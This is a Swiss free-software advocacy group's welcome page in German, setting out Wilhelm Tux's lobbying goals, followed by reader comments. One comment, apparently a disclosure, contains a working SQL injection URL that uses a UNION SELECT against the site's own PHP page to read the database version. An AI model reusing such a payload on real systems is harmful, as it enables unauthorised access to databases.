Wilhelm Tux welcome

Home Über uns Facts Presse FAQ News Optionen LibreOffice NDG

Unsere Aktivitäten
Statuten
Vorstand Wilhelm Tux
Ihre Unterstützung
Unterzeichnen


Die Kampagne Wilhelm Tux

Wilhelm Tux ist eine Non-Profit-Organisation mit dem Ziel, den Einsatz von freier Software bei der öffentlichen Hand zu fördern, offene Standards in allen staatlichen Institutionen durchzusetzen und in der Schweiz ein konstruktives Klima für Freie Software zu schaffen.

Wir haben es uns zur Aufgabe gemacht, die politische Diskussion anzuregen und aktives Lobbying zu betreiben, um den Staat und seine Bürger für das Thema zu sensibilisieren.

Durch die Verwendung von Software kommerzieller Anbieter verletzt der Staat seinen Grundauftrag, allen Bürgern die Möglichkeit zu freiem Zugriff auf Informationen zu geben, indem der Benutzer zum Lesen und Bearbeiten von Daten im Besitz des jeweiligen Programmes sein muss. Solange der Bürger den Quelltext nicht einsehen kann, ist nicht transparent, was mit den Daten geschieht und wer auf sie Zugriff nehmen kann.

Mit dem Einsatz proprietärer Software zementiert der Staat die Monopolstellung globaler Konzerne und handelt seinem ordnungspolitischen Auftrag zuwider, Rahmenbedingungen für freien Wettbewerb zu schaffen. Erst offene Standards und freie Qellen können garantieren, dass in unserem Land der Softwareentwicklung eine Chance gegeben und sich ein vom Wohlwollen kommerzieller Lizenzverkäufer unabhängiger Dienstleistungssektor bilden kann.

Freie Software macht es für die Schweiz erst möglich, kompatible und moderne IT-Infrastrukturen in unserem föderalisierten System aufzubauen, indem keine Softwarekosten für Programme anfallen. Auch für kleine oder finanzschwache Institutionen bis zur letzten Berggemeinde wird der sinnvolle und professionelle Einsatz von Informationstechnologie erschwinglich.

Unsere Informationsplattform ist Dreh- und Angelpunkt unserer Kampagne. Hier wird über Freie Software informiert, diskutiert und um Unterstützung geworben. Wir stützen uns dabei auf die Arbeit und den Einsatz Freiwilliger aus vielen Vereinen, Aktionen und Unternehmen, um ein konsequentes und erweitertes Demokratieverständnis in unserem Land zu ermöglichen.

Kommentare zu dieser Seite:
+ kritik Von: Karl (2007-07-02 22:31:43)
um linux zu helfen und zu fördern wäre es wohl eher angebracht solche internet-auftritte abzubauen. warum gibt es zig tausend seiten wo gleiche inhalte zu finden sind.
+ Antwort auf kritik Von: Theo Schmidt (2007-08-28 11:21:52)
Es gibt tatsächlich sehr viele Linux-User sites. Die Site von Wilhelm Tux dient jedoch spezifisch der Lobby-Arbeit für freie Software und offene Standards in der Schweiz.
+ Diese Seite, keine Kritik Von: Gessler (2008-09-04 17:02:44)
Super seite! Bin durch ubuntu-DVD-Verpackung drauggekommen! Endlich find ich mal eine linux-Sitge. Nur forum fehlt
+ Anwort auf Diese Seite, keine Von: Theo Schmidt (2008-09-04 17:03:42)
Danke für die Blumen! *lol*
+ hackbar Von: newkaiza@web.de (2009-05-02 17:46:33)
Sql injection http://www.wilhelmtux.ch/index.phtml?MID=2&PID=14%20union%20select%201,2,unhex(hex(@@version)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+%20f
Anregung Von: Lehmy (2009-06-22 16:33:57)
Forum fehlt^^
+ Anregung Von: Theo Schmidt (2009-06-23 11:44:41)
Statt einem Forum haben wir mehrere Mailing Listen, aber danke für die Anregung.
Betreff: Mein Name:

Valid HTML 4.01!
Valid CSS!